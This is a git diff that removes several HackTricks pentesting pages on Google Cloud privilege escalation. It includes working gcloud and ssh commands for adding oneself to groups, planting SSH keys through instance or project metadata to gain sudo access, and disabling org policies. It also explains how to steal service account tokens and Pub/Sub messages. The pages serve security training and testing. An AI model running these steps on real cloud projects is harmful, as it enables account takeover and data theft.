-{% endhint %} - -## Cloudidentity - -For more information about the cloudidentity service, check this page: - -{% content-ref url="../gcp-services/gcp-iam-and-org-policies-enum.md" %} -[gcp-iam-and-org-policies-enum.md](../gcp-services/gcp-iam-and-org-policies-enum.md) -{% endcontent-ref %} - -### Add yourself to a group - -If your user has enough permissions or the group is misconfigured, he might be able to make himself a member of a new group: - -{% code overflow="wrap" %} -```bash -gcloud identity groups memberships add --group-email --member-email [--roles OWNER] -# If --roles isn't specified you will get MEMBER -``` -{% endcode %} - -### Modify group membership - -If your user has enough permissions or the group is misconfigured, he might be able to make himself OWNER of a group he is a member of: - -{% code overflow="wrap" %} -```bash -# Check the current membership level -gcloud identity groups memberships describe --member-email --group-email - -# If not OWNER try -gcloud identity groups memberships modify-membership-roles --group-email --member-email --add-roles=OWNER -``` -{% endcode %} - -{% hint style="success" %} -Learn & practice AWS Hacking:[**HackTricks Training AWS Red Team Expert (ARTE)**](https://training.hacktricks.xyz/courses/arte)\ -Learn & practice GCP Hacking: [**HackTricks Training GCP Red Team Expert (GRTE)**](https://training.hacktricks.xyz/courses/grte) - -
- -Support HackTricks - -* Check the [**subscription plans**](https://github.com/sponsors/carlospolop)! -* **Join the** 💬 [**Discord group**](https://discord.gg/hRep4RUj7f) or the [**telegram group**](https://t.me/peass) or **follow** us on **Twitter** 🐦 [**@hacktricks\_live**](https://twitter.com/hacktricks_live)**.** -* **Share hacking tricks by submitting PRs to the** [**HackTricks**](https://github.com/carlospolop/hacktricks) and [**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud) github repos. - -
-{% endhint %} diff --git a/pentesting-cloud/gcp-security/gcp-privilege-escalation/gcp-compute-privesc/gcp-add-custom-ssh-metadata.md b/pentesting-cloud/gcp-security/gcp-privilege-escalation/gcp-compute-privesc/gcp-add-custom-ssh-metadata.md deleted file mode 100644 index c762f6c84..000000000 --- a/pentesting-cloud/gcp-security/gcp-privilege-escalation/gcp-compute-privesc/gcp-add-custom-ssh-metadata.md +++ /dev/null @@ -1,115 +0,0 @@ -# GCP - Add Custom SSH Metadata - -## GCP - Add Custom SSH Metadata - -{% hint style="success" %} -Learn & practice AWS Hacking:[**HackTricks Training AWS Red Team Expert (ARTE)**](https://training.hacktricks.xyz/courses/arte)\ -Learn & practice GCP Hacking: [**HackTricks Training GCP Red Team Expert (GRTE)**](https://training.hacktricks.xyz/courses/grte) - -
- -Support HackTricks - -* Check the [**subscription plans**](https://github.com/sponsors/carlospolop)! -* **Join the** 💬 [**Discord group**](https://discord.gg/hRep4RUj7f) or the [**telegram group**](https://t.me/peass) or **follow** us on **Twitter** 🐦 [**@hacktricks\_live**](https://twitter.com/hacktricks_live)**.** -* **Share hacking tricks by submitting PRs to the** [**HackTricks**](https://github.com/carlospolop/hacktricks) and [**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud) github repos. - -
-{% endhint %} - -### Modifying the metadata - -Metadata modification on an instance could lead to **significant security risks if an attacker gains the necessary permissions**. - -#### **Incorporation of SSH Keys into Custom Metadata** - -On GCP, **Linux systems** often execute scripts from the [Python Linux Guest Environment for Google Compute Engine](https://github.com/GoogleCloudPlatform/compute-image-packages/tree/master/packages/python-google-compute-engine#accounts). A critical component of this is the [accounts daemon](https://github.com/GoogleCloudPlatform/compute-image-packages/tree/master/packages/python-google-compute-engine#accounts), which is designed to **regularly check** the instance metadata endpoint for **updates to the authorized SSH public keys**. - -Therefore, if an attacker can modify custom metadata, he could make the the daemon find a new public key, which will processed and **integrated into the local system**. The key will be added into `~/.ssh/authorized_keys` file of an **existing user or potentially creating a new user with `sudo` privileges**, depending on the key's format. And the attacker will be able to compromise the host. - -#### **Add SSH key to existing privileged user** - -1. **Examine Existing SSH Keys on the Instance:** - * Execute the command to describe the instance and its metadata to locate existing SSH keys. The relevant section in the output will be under `metadata`, specifically the `ssh-keys` key. - - ```bash - gcloud compute instances describe [INSTANCE] --zone [ZONE] - ``` - * Pay attention to the format of the SSH keys: the username precedes the key, separated by a colon. -2. **Prepare a Text File for SSH Key Metadata:** - * Save the details of usernames and their corresponding SSH keys into a text file named `meta.txt`. This is essential for preserving the existing keys while adding new ones. -3. **Generate a New SSH Key for the Target User (`alice` in this example):** - * Use the `ssh-keygen` command to generate a new SSH key, ensuring that the comment field (`-C`) matches the target username. - - ```bash - ssh-keygen -t rsa -C "alice" -f ./key -P "" && cat ./key.pub - ``` - * Add the new public key to `meta.txt`, mimicking the format found in the instance's metadata. -4. **Update the Instance's SSH Key Metadata:** - * Apply the updated SSH key metadata to the instance using the `gcloud compute instances add-metadata` command. - - ```bash - gcloud compute instances add-metadata [INSTANCE] --metadata-from-file ssh-keys=meta.txt - ``` -5. **Access the Instance Using the New SSH Key:** - * Connect to the instance with SSH using the new key, accessing the shell in the context of the target user (`alice` in this example). - - ```bash - ssh -i ./key alice@localhost - sudo id - ``` - -#### **Create a new privileged user and add a SSH key** - -If no interesting user is found, it's possible to create a new one which will be given `sudo` privileges: - -```bash -# define the new account username -NEWUSER="definitelynotahacker" - -# create a key -ssh-keygen -t rsa -C "$NEWUSER" -f ./key -P "" - -# create the input meta file -NEWKEY="$(cat ./key.pub)" -echo "$NEWUSER:$NEWKEY" > ./meta.txt - -# update the instance metadata -gcloud compute instances add-metadata [INSTANCE_NAME] --metadata-from-file ssh-keys=meta.txt - -# ssh to the new account -ssh -i ./key "$NEWUSER"@localhost -``` - -#### SSH keys at project level - -It's possible to broaden the reach of SSH access to multiple Virtual Machines (VMs) in a cloud environment by **applying SSH keys at the project level**. This approach allows SSH access to any instance within the project that hasn't explicitly blocked project-wide SSH keys. Here's a summarized guide: - -1. **Apply SSH Keys at the Project Level:** - * Use the `gcloud compute project-info add-metadata` command to add SSH keys from `meta.txt` to the project's metadata. This action ensures that the SSH keys are recognized across all VMs in the project, unless a VM has the "Block project-wide SSH keys" option enabled. - - ```bash - gcloud compute project-info add-metadata --metadata-from-file ssh-keys=meta.txt - ``` -2. **SSH into Instances Using Project-Wide Keys:** - * With project-wide SSH keys in place, you can SSH into any instance within the project. Instances that do not block project-wide keys will accept the SSH key, granting access. - * A direct method to SSH into an instance is using the `gcloud compute ssh [INSTANCE]` command. This command uses your current username and the SSH keys set at the project level to attempt access. - -## References - -* [https://about.gitlab.com/blog/2020/02/12/plundering-gcp-escalating-privileges-in-google-cloud-platform/](https://about.gitlab.com/blog/2020/02/12/plundering-gcp-escalating-privileges-in-google-cloud-platform/) - -{% hint style="success" %} -Learn & practice AWS Hacking:[**HackTricks Training AWS Red Team Expert (ARTE)**](https://training.hacktricks.xyz/courses/arte)\ -Learn & practice GCP Hacking: [**HackTricks Training GCP Red Team Expert (GRTE)**](https://training.hacktricks.xyz/courses/grte) - -
- -Support HackTricks - -* Check the [**subscription plans**](https://github.com/sponsors/carlospolop)! -* **Join the** 💬 [**Discord group**](https://discord.gg/hRep4RUj7f) or the [**telegram group**](https://t.me/peass) or **follow** us on **Twitter** 🐦 [**@hacktricks\_live**](https://twitter.com/hacktricks_live)**.** -* **Share hacking tricks by submitting PRs to the** [**HackTricks**](https://github.com/carlospolop/hacktricks) and [**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud) github repos. - -
-{% endhint %} diff --git a/pentesting-cloud/gcp-security/gcp-privilege-escalation/gcp-container-privesc.md b/pentesting-cloud/gcp-security/gcp-privilege-escalation/gcp-container-privesc.md deleted file mode 100644 index 0599a6328..000000000 --- a/pentesting-cloud/gcp-security/gcp-privilege-escalation/gcp-container-privesc.md +++ /dev/null @@ -1,118 +0,0 @@ -# GCP - Container Privesc - -{% hint style="success" %} -Learn & practice AWS Hacking:[**HackTricks Training AWS Red Team Expert (ARTE)**](https://training.hacktricks.xyz/courses/arte)\ -Learn & practice GCP Hacking: [**HackTricks Training GCP Red Team Expert (GRTE)**](https://training.hacktricks.xyz/courses/grte) - -
- -Support HackTricks - -* Check the [**subscription plans**](https://github.com/sponsors/carlospolop)! -* **Join the** 💬 [**Discord group**](https://discord.gg/hRep4RUj7f) or the [**telegram group**](https://t.me/peass) or **follow** us on **Twitter** 🐦 [**@hacktricks\_live**](https://twitter.com/hacktricks_live)**.** -* **Share hacking tricks by submitting PRs to the** [**HackTricks**](https://github.com/carlospolop/hacktricks) and [**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud) github repos. - -
-{% endhint %} - -## container - -### `container.clusters.get` - -This permission allows to **gather credentials for the Kubernetes cluster** using something like: - -```bash -gcloud container clusters get-credentials --zone -``` - -Without extra permissions, the credentials are pretty basic as you can **just list some resource**, but hey are useful to find miss-configurations in the environment. - -{% hint style="info" %} -Note that **kubernetes clusters might be configured to be private**, that will disallow that access to the Kube-API server from the Internet. -{% endhint %} - -If you don't have this permission you can still access the cluster, but you need to **create your own kubectl config file** with the clusters info. A new generated one looks like this: - -```yaml -apiVersion: v1 -clusters: -- cluster: - certificate-authority-data: LS0tLS1CRUdJTiBDRVJUSUZJQ0FURS0tLS0tCk1JSUVMRENDQXBTZ0F3SUJBZ0lRRzNaQmJTSVlzeVRPR1FYODRyNDF3REFOQmdrcWhraUc5dzBCQVFzRkFEQXYKTVMwd0t3WURWUVFERXlRMk9UQXhZVEZoWlMweE56ZGxMVFF5TkdZdE9HVmhOaTAzWVdFM01qVmhNR05tTkdFdwpJQmNOTWpJeE1qQTBNakl4T1RJMFdoZ1BNakExTWpFeE1qWXlNekU1TWpSYU1DOHhMVEFyQmdOVkJBTVRKRFk1Ck1ERmhNV0ZsTFRFM04yVXROREkwWmkwNFpXRTJMVGRoWVRjeU5XRXdZMlkwWVRDQ0FhSXdEUVlKS29aSWh2Y04KQVFFQkJRQURnZ0dQQURDQ0FZb0NnZ0dCQU00TWhGemJ3Y3VEQXhiNGt5WndrNEdGNXRHaTZmb0pydExUWkI4Rgo5TDM4a2V2SUVWTHpqVmtoSklpNllnSHg4SytBUHl4RHJQaEhXMk5PczFNMmpyUXJLSHV6M0dXUEtRUmtUWElRClBoMy9MMDVtbURwRGxQK3hKdzI2SFFqdkE2Zy84MFNLakZjRXdKRVhZbkNMMy8yaFBFMzdxN3hZbktwTWdKVWYKVnoxOVhwNEhvbURvOEhUN2JXUTJKWTVESVZPTWNpbDhkdDZQd3FUYmlLNjJoQzNRTHozNzNIbFZxaiszNy90RgpmMmVwUUdFOG90a0VVOFlHQ3FsRTdzaVllWEFqbUQ4bFZENVc5dk1RNXJ0TW8vRHBTVGNxRVZUSzJQWk1rc0hyCmMwbGVPTS9LeXhnaS93TlBRdW5oQ2hnRUJIZTVzRmNxdmRLQ1pmUFovZVI1Qk0vc0w1WFNmTE9sWWJLa2xFL1YKNFBLNHRMVmpiYVg1VU9zMUZIVXMrL3IyL1BKQ2hJTkRaVTV2VjU0L1c5NWk4RnJZaUpEYUVGN0pveXJvUGNuMwpmTmNjQ2x1eGpOY1NsZ01ISGZKRzZqb0FXLzB0b2U3ek05RHlQOFh3NW44Zm5lQm5aVTFnYXNKREZIYVlZbXpGCitoQzFETmVaWXNibWNxOGVPVG9LOFBKRjZ3SURBUUFCbzBJd1FEQU9CZ05WSFE4QkFmOEVCQU1DQWdRd0R3WUQKVlIwVEFRSC9CQVV3QXdFQi96QWRCZ05WSFE0RUZnUVU5UkhvQXlxY3RWSDVIcmhQZ1BjYzF6Sm9kWFV3RFFZSgpLb1pJaHZjTkFRRUxCUUFEZ2dHQkFLbnp3VEx0QlJBVE1KRVB4TlBNbmU2UUNqZDJZTDgxcC9oeVc1eWpYb2w5CllkMTRRNFVlVUJJVXI0QmJadzl0LzRBQ3ZlYUttVENaRCswZ2wyNXVzNzB3VlFvZCtleVhEK2I1RFBwUUR3Z1gKbkJLcFFCY1NEMkpvZ29tT3M3U1lPdWVQUHNrODVvdWEwREpXLytQRkY1WU5ublc3Z1VLT2hNZEtKcnhuYUVGZAprVVl1TVdPT0d4U29qVndmNUsyOVNCbGJ5YXhDNS9tOWkxSUtXV2piWnZPN0s4TTlYLytkcDVSMVJobDZOSVNqCi91SmQ3TDF2R0crSjNlSjZneGs4U2g2L28yRnhxZWFNdDladWw4MFk4STBZaGxXVmlnSFMwZmVBUU1NSzUrNzkKNmozOWtTZHFBYlhPaUVOMzduOWp2dVlNN1ZvQzlNUk1oYUNyQVNhR2ZqWEhtQThCdlIyQW5iQThTVGpQKzlSMQp6VWRpK3dsZ0V4bnFvVFpBcUVHRktuUTlQcjZDaDYvR0xWWStqYXhuR3lyUHFPYlpNZTVXUDFOUGs4NkxHSlhCCjc1elFvanEyRUpxanBNSjgxT0gzSkxOeXRTdmt4UDFwYklxTzV4QUV0OWxRMjh4N28vbnRuaWh1WmR6M0lCRU8KODdjMDdPRGxYNUJQd0hIdzZtKzZjUT09Ci0tLS0tRU5EIENFUlRJRklDQVRFLS0tLS0K - server: https://34.123.141.28 - name: gke_security-devbox_us-central1_autopilot-cluster-1 -contexts: -- context: - cluster: gke_security-devbox_us-central1_autopilot-cluster-1 - user: gke_security-devbox_us-central1_autopilot-cluster-1 - name: gke_security-devbox_us-central1_autopilot-cluster-1 -current-context: gke_security-devbox_us-central1_autopilot-cluster-1 -kind: Config -preferences: {} -users: -- name: gke_security-devbox_us-central1_autopilot-cluster-1 - user: - auth-provider: - config: - access-token: - cmd-args: config config-helper --format=json - cmd-path: gcloud - expiry: "2022-12-06T01:13:11Z" - expiry-key: '{.credential.token_expiry}' - token-key: '{.credential.access_token}' - name: gcp -``` - -### `container.roles.escalate` | `container.clusterRoles.escalate` - -**Kubernetes** by default **prevents** principals from being able to **create** or **update** **Roles** and **ClusterRoles** with **more permissions** that the ones the principal has. However, a **GCP** principal with that permissions will be **able to create/update Roles/ClusterRoles with more permissions** that ones he held, effectively bypassing the Kubernetes protection against this behaviour. - -**`container.roles.create`** and/or **`container.roles.update`** OR **`container.clusterRoles.create`** and/or **`container.clusterRoles.update`** respectively are **also** **necessary** to perform those privilege escalation actions. - -### `container.roles.bind` | `container.clusterRoles.bind` - -**Kubernetes** by default **prevents** principals from being able to **create** or **update** **RoleBindings** and **ClusterRoleBindings** to give **more permissions** that the ones the principal has. However, a **GCP** principal with that permissions will be **able to create/update RolesBindings/ClusterRolesBindings with more permissions** that ones he has, effectively bypassing the Kubernetes protection against this behaviour. - -**`container.roleBindings.create`** and/or **`container.roleBindings.update`** OR **`container.clusterRoleBindings.create`** and/or **`container.clusterRoleBindings.update`** respectively are also **necessary** to perform those privilege escalation actions. - -### `container.cronJobs.create` | `container.cronJobs.update` | `container.daemonSets.create` | `container.daemonSets.update` | `container.deployments.create` | `container.deployments.update` | `container.jobs.create` | `container.jobs.update` | `container.pods.create` | `container.pods.update` | `container.replicaSets.create` | `container.replicaSets.update` | `container.replicationControllers.create` | `container.replicationControllers.update` | `container.scheduledJobs.create` | `container.scheduledJobs.update` | `container.statefulSets.create` | `container.statefulSets.update` - -All these permissions are going to allow you to **create or update a resource** where you can **define** a **pod**. Defining a pod you can **specify the SA** that is going to be **attached** and the **image** that is going to be **run**, therefore you can run an image that is going to **exfiltrate the token of the SA to your server** allowing you to escalate to any service account.\ -For more information check: - -As we are in a GCP environment, you will also be able to **get the nodepool GCP SA** from the **metadata** service and **escalate privileges in GC**P (by default the compute SA is used). - -### `container.secrets.get` | `container.secrets.list` - -As [**explained in this page**, ](../../kubernetes-security/abusing-roles-clusterroles-in-kubernetes/#listing-secrets)with these permissions you can **read** the **tokens** of all the **SAs of kubernetes**, so you can escalate to them. - -### `container.pods.exec` - -With this permission you will be able to **exec into pods**, which gives you **access** to all the **Kubernetes SAs running in pods** to escalate privileges within K8s, but also you will be able to **steal** the **GCP Service Account** of the **NodePool**, **escalating privileges in GCP**. - -### `container.pods.portForward` - -As **explained in this page**, with these permissions you can **access local services** running in **pods** that might allow you to **escalate privileges in Kubernetes** (and in **GCP** if somehow you manage to talk to the metadata service)**.** - -### `container.serviceAccounts.createToken` - -Because of the **name** of the **permission**, it **looks like that it will allow you to generate tokens of the K8s Service Accounts**, so you will be able to **privesc to any SA** inside Kubernetes. However, I couldn't find any API endpoint to use it, so let me know if you find it. - -### `container.mutatingWebhookConfigurations.create` | `container.mutatingWebhookConfigurations.update` - -These permissions might allow you to escalate privileges in Kubernetes, but more probably, you could abuse them to **persist in the cluster**.\ -For more information [**follow this link**](../../kubernetes-security/abusing-roles-clusterroles-in-kubernetes/#malicious-admission-controller). - -{% hint style="success" %} -Learn & practice AWS Hacking:[**HackTricks Training AWS Red Team Expert (ARTE)**](https://training.hacktricks.xyz/courses/arte)\ -Learn & practice GCP Hacking: [**HackTricks Training GCP Red Team Expert (GRTE)**](https://training.hacktricks.xyz/courses/grte) - -
- -Support HackTricks - -* Check the [**subscription plans**](https://github.com/sponsors/carlospolop)! -* **Join the** 💬 [**Discord group**](https://discord.gg/hRep4RUj7f) or the [**telegram group**](https://t.me/peass) or **follow** us on **Twitter** 🐦 [**@hacktricks\_live**](https://twitter.com/hacktricks_live)**.** -* **Share hacking tricks by submitting PRs to the** [**HackTricks**](https://github.com/carlospolop/hacktricks) and [**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud) github repos. - -
-{% endhint %} diff --git a/pentesting-cloud/gcp-security/gcp-privilege-escalation/gcp-deploymentmaneger-privesc.md b/pentesting-cloud/gcp-security/gcp-privilege-escalation/gcp-deploymentmaneger-privesc.md deleted file mode 100644 index 38c2f36ce..000000000 --- a/pentesting-cloud/gcp-security/gcp-privilege-escalation/gcp-deploymentmaneger-privesc.md +++ /dev/null @@ -1,55 +0,0 @@ -# GCP - Deploymentmaneger Privesc - -{% hint style="success" %} -Learn & practice AWS Hacking:[**HackTricks Training AWS Red Team Expert (ARTE)**](https://training.hacktricks.xyz/courses/arte)\ -Learn & practice GCP Hacking: [**HackTricks Training GCP Red Team Expert (GRTE)**](https://training.hacktricks.xyz/courses/grte) - -
- -Support HackTricks - -* Check the [**subscription plans**](https://github.com/sponsors/carlospolop)! -* **Join the** 💬 [**Discord group**](https://discord.gg/hRep4RUj7f) or the [**telegram group**](https://t.me/peass) or **follow** us on **Twitter** 🐦 [**@hacktricks\_live**](https://twitter.com/hacktricks_live)**.** -* **Share hacking tricks by submitting PRs to the** [**HackTricks**](https://github.com/carlospolop/hacktricks) and [**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud) github repos. - -
-{% endhint %} - -## deploymentmanager - -### `deploymentmanager.deployments.create` - -This single permission lets you **launch new deployments** of resources into GCP with arbitrary service accounts. You could for example launch a compute instance with a SA to escalate to it. - -You could actually **launch any resource** listed in `gcloud deployment-manager types list` - -In the [**original research**](https://rhinosecuritylabs.com/gcp/privilege-escalation-google-cloud-platform-part-1/) following[ **script**](https://github.com/RhinoSecurityLabs/GCP-IAM-Privilege-Escalation/blob/master/ExploitScripts/deploymentmanager.deployments.create.py) is used to deploy a compute instance, however that script won't work. Check a script to automate the [**creation, exploit and cleaning of a vuln environment here**](https://github.com/carlospolop/gcp_privesc_scripts/blob/main/tests/1-deploymentmanager.deployments.create.sh)**.** - -### `deploymentmanager.deployments.update` - -This is like the previous abuse but instead of creating a new deployment, you modifies one already existing (so be careful) - -Check a script to automate the [**creation, exploit and cleaning of a vuln environment here**](https://github.com/carlospolop/gcp_privesc_scripts/blob/main/tests/e-deploymentmanager.deployments.update.sh)**.** - -### `deploymentmanager.deployments.setIamPolicy` - -This is like the previous abuse but instead of directly creating a new deployment, you first give you that access and then abuses the permission as explained in the previous _deploymentmanager.deployments.create_ section. - -## References - -* [https://rhinosecuritylabs.com/gcp/privilege-escalation-google-cloud-platform-part-1/](https://rhinosecuritylabs.com/gcp/privilege-escalation-google-cloud-platform-part-1/) - -{% hint style="success" %} -Learn & practice AWS Hacking:[**HackTricks Training AWS Red Team Expert (ARTE)**](https://training.hacktricks.xyz/courses/arte)\ -Learn & practice GCP Hacking: [**HackTricks Training GCP Red Team Expert (GRTE)**](https://training.hacktricks.xyz/courses/grte) - -
- -Support HackTricks - -* Check the [**subscription plans**](https://github.com/sponsors/carlospolop)! -* **Join the** 💬 [**Discord group**](https://discord.gg/hRep4RUj7f) or the [**telegram group**](https://t.me/peass) or **follow** us on **Twitter** 🐦 [**@hacktricks\_live**](https://twitter.com/hacktricks_live)**.** -* **Share hacking tricks by submitting PRs to the** [**HackTricks**](https://github.com/carlospolop/hacktricks) and [**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud) github repos. - -
-{% endhint %} diff --git a/pentesting-cloud/gcp-security/gcp-privilege-escalation/gcp-misc-perms-privesc.md b/pentesting-cloud/gcp-security/gcp-privilege-escalation/gcp-misc-perms-privesc.md deleted file mode 100644 index 05cf0eeb1..000000000 --- a/pentesting-cloud/gcp-security/gcp-privilege-escalation/gcp-misc-perms-privesc.md +++ /dev/null @@ -1,51 +0,0 @@ -# GCP - Generic Permissions Privesc - -{% hint style="success" %} -Learn & practice AWS Hacking:[**HackTricks Training AWS Red Team Expert (ARTE)**](https://training.hacktricks.xyz/courses/arte)\ -Learn & practice GCP Hacking: [**HackTricks Training GCP Red Team Expert (GRTE)**](https://training.hacktricks.xyz/courses/grte) - -
- -Support HackTricks - -* Check the [**subscription plans**](https://github.com/sponsors/carlospolop)! -* **Join the** 💬 [**Discord group**](https://discord.gg/hRep4RUj7f) or the [**telegram group**](https://t.me/peass) or **follow** us on **Twitter** 🐦 [**@hacktricks\_live**](https://twitter.com/hacktricks_live)**.** -* **Share hacking tricks by submitting PRs to the** [**HackTricks**](https://github.com/carlospolop/hacktricks) and [**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud) github repos. - -
-{% endhint %} - -## Generic Interesting Permissions - -### \*.setIamPolicy - -If you owns a user that has the **`setIamPolicy`** permission in a resource you can **escalate privileges in that resource** because you will be able to change the IAM policy of that resource and give you more privileges over it.\ -This permission can also allow to **escalate to other principals** if the resource allow to execute code and the iam.ServiceAccounts.actAs is not necessary. - -* _cloudfunctions.functions.setIamPolicy_ - * Modify the policy of a Cloud Function to allow yourself to invoke it. - -There are tens of resources types with this kind of permission, you can find all of them in [https://cloud.google.com/iam/docs/permissions-reference](https://cloud.google.com/iam/docs/permissions-reference) searching for setIamPolicy. - -### \*.create, \*.update - -These permissions can be very useful to try to escalate privileges in resources by **creating a new one or updating a new one**. These can of permissions are specially useful if you also has the permission **iam.serviceAccounts.actAs** over a Service Account and the resource you have .create/.update over can attach a service account. - -### \*ServiceAccount\* - -This permission will usually let you **access or modify a Service Account in some resource** (e.g.: compute.instances.setServiceAccount). This **could lead to a privilege escalation** vector, but it will depend on each case. - -{% hint style="success" %} -Learn & practice AWS Hacking:[**HackTricks Training AWS Red Team Expert (ARTE)**](https://training.hacktricks.xyz/courses/arte)\ -Learn & practice GCP Hacking: [**HackTricks Training GCP Red Team Expert (GRTE)**](https://training.hacktricks.xyz/courses/grte) - -
- -Support HackTricks - -* Check the [**subscription plans**](https://github.com/sponsors/carlospolop)! -* **Join the** 💬 [**Discord group**](https://discord.gg/hRep4RUj7f) or the [**telegram group**](https://t.me/peass) or **follow** us on **Twitter** 🐦 [**@hacktricks\_live**](https://twitter.com/hacktricks_live)**.** -* **Share hacking tricks by submitting PRs to the** [**HackTricks**](https://github.com/carlospolop/hacktricks) and [**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud) github repos. - -
-{% endhint %} diff --git a/pentesting-cloud/gcp-security/gcp-privilege-escalation/gcp-orgpolicy-privesc.md b/pentesting-cloud/gcp-security/gcp-privilege-escalation/gcp-orgpolicy-privesc.md deleted file mode 100644 index 60059cf64..000000000 --- a/pentesting-cloud/gcp-security/gcp-privilege-escalation/gcp-orgpolicy-privesc.md +++ /dev/null @@ -1,53 +0,0 @@ -# GCP - Orgpolicy Privesc - -{% hint style="success" %} -Learn & practice AWS Hacking:[**HackTricks Training AWS Red Team Expert (ARTE)**](https://training.hacktricks.xyz/courses/arte)\ -Learn & practice GCP Hacking: [**HackTricks Training GCP Red Team Expert (GRTE)**](https://training.hacktricks.xyz/courses/grte) - -
- -Support HackTricks - -* Check the [**subscription plans**](https://github.com/sponsors/carlospolop)! -* **Join the** 💬 [**Discord group**](https://discord.gg/hRep4RUj7f) or the [**telegram group**](https://t.me/peass) or **follow** us on **Twitter** 🐦 [**@hacktricks\_live**](https://twitter.com/hacktricks_live)**.** -* **Share hacking tricks by submitting PRs to the** [**HackTricks**](https://github.com/carlospolop/hacktricks) and [**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud) github repos. - -
-{% endhint %} - -## orgpolicy - -### `orgpolicy.policy.set` - -An attacker leveraging **orgpolicy.policy.set** can manipulate organizational policies, which will allow him to remove certain restrictions impeding specific operations. For instance, the constraint **appengine.disableCodeDownload** usually blocks downloading of App Engine source code. However, by using **orgpolicy.policy.set**, an attacker can deactivate this constraint, thereby gaining access to download the source code, despite it initially being protected. - -{% code overflow="wrap" %} -```bash -# Get info -gcloud resource-manager org-policies describe [--folder | --organization | --project ] - -# Disable -gcloud resource-manager org-policies disable-enforce [--folder | --organization | --project ] -``` -{% endcode %} - -A python script for this method can be found [here](https://github.com/RhinoSecurityLabs/GCP-IAM-Privilege-Escalation/blob/master/ExploitScripts/orgpolicy.policy.set.py). - -## References - -* [https://rhinosecuritylabs.com/cloud-security/privilege-escalation-google-cloud-platform-part-2/](https://rhinosecuritylabs.com/cloud-security/privilege-escalation-google-cloud-platform-part-2/) - -{% hint style="success" %} -Learn & practice AWS Hacking:[**HackTricks Training AWS Red Team Expert (ARTE)**](https://training.hacktricks.xyz/courses/arte)\ -Learn & practice GCP Hacking: [**HackTricks Training GCP Red Team Expert (GRTE)**](https://training.hacktricks.xyz/courses/grte) - -
- -Support HackTricks - -* Check the [**subscription plans**](https://github.com/sponsors/carlospolop)! -* **Join the** 💬 [**Discord group**](https://discord.gg/hRep4RUj7f) or the [**telegram group**](https://t.me/peass) or **follow** us on **Twitter** 🐦 [**@hacktricks\_live**](https://twitter.com/hacktricks_live)**.** -* **Share hacking tricks by submitting PRs to the** [**HackTricks**](https://github.com/carlospolop/hacktricks) and [**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud) github repos. - -
-{% endhint %} diff --git a/pentesting-cloud/gcp-security/gcp-privilege-escalation/gcp-pubsub-privesc.md b/pentesting-cloud/gcp-security/gcp-privilege-escalation/gcp-pubsub-privesc.md deleted file mode 100644 index dbddd51d6..000000000 --- a/pentesting-cloud/gcp-security/gcp-privilege-escalation/gcp-pubsub-privesc.md +++ /dev/null @@ -1,63 +0,0 @@ -# GCP - Pubsub Privesc - -{% hint style="success" %} -Learn & practice AWS Hacking:[**HackTricks Training AWS Red Team Expert (ARTE)**](https://training.hacktricks.xyz/courses/arte)\ -Learn & practice GCP Hacking: [**HackTricks Training GCP Red Team Expert (GRTE)**](https://training.hacktricks.xyz/courses/grte) - -
- -Support HackTricks - -* Check the [**subscription plans**](https://github.com/sponsors/carlospolop)! -* **Join the** 💬 [**Discord group**](https://discord.gg/hRep4RUj7f) or the [**telegram group**](https://t.me/peass) or **follow** us on **Twitter** 🐦 [**@hacktricks\_live**](https://twitter.com/hacktricks_live)**.** -* **Share hacking tricks by submitting PRs to the** [**HackTricks**](https://github.com/carlospolop/hacktricks) and [**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud) github repos. - -
-{% endhint %} - -## PubSub - -Get more information in: - -{% content-ref url="../gcp-services/gcp-pub-sub.md" %} -[gcp-pub-sub.md](../gcp-services/gcp-pub-sub.md) -{% endcontent-ref %} - -### `pubsub.snapshots.create` - -The snapshots of topics **contain the current unACKed messages and every message after it**. You could create a snapshot of a topic to **access all the messages**, **avoiding access the topic directly**. - -### **`pubsub.snapshots.setIamPolicy`** - -Assign the pervious permissions to you. - -### `pubsub.subscriptions.create` - -You can create a push subscription in a topic that will be sending all the received messages to the indicated URL - -### **`pubsub.subscriptions.update`** - -Set your own URL as push endpoint to steal the messages. - -### `pubsub.subscriptions.consume` - -Access messages using the subscription. - -### `pubsub.subscriptions.setIamPolicy` - -Give yourself any of the preiovus permissions - -{% hint style="success" %} -Learn & practice AWS Hacking:[**HackTricks Training AWS Red Team Expert (ARTE)**](https://training.hacktricks.xyz/courses/arte)\ -Learn & practice GCP Hacking: [**HackTricks Training GCP Red Team Expert (GRTE)**](https://training.hacktricks.xyz/courses/grte) - -
- -Support HackTricks - -* Check the [**subscription plans**](https://github.com/sponsors/carlospolop)! -* **Join the** 💬 [**Discord group**](https://discord.gg/hRep4RUj7f) or the [**telegram group**](https://t.me/peass) or **follow** us on **Twitter** 🐦 [**@hacktricks\_live**](https://twitter.com/hacktricks_live)**.** -* **Share hacking tricks by submitting PRs to the** [**HackTricks**](https://github.com/carlospolop/hacktricks) and [**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud) github repos. - -
-{% endhint %} diff --git a/pentesting-cloud/gcp-security/gcp-privilege-escalation/gcp-resourcemanager-privesc.md b/pentesting-cloud/gcp-security/gcp-privilege-escalation/gcp-resourcemanager-privesc.md deleted file mode 100644 index 2d4dea5a5..000000000 --- a/pentesting-cloud/gcp-security/gcp-privilege-escalation/gcp-resourcemanager-privesc.md +++ /dev/null @@ -1,45 +0,0 @@ -# GCP - Resourcemanager Privesc - -{% hint style="success" %} -Learn & practice AWS Hacking:[**HackTricks Training AWS Red Team Expert (ARTE)**](https://training.hacktricks.xyz/courses/arte)\ -Learn & practice GCP Hacking: [**HackTricks Training GCP Red Team Expert (GRTE)**](https://training.hacktricks.xyz/courses/grte) - -
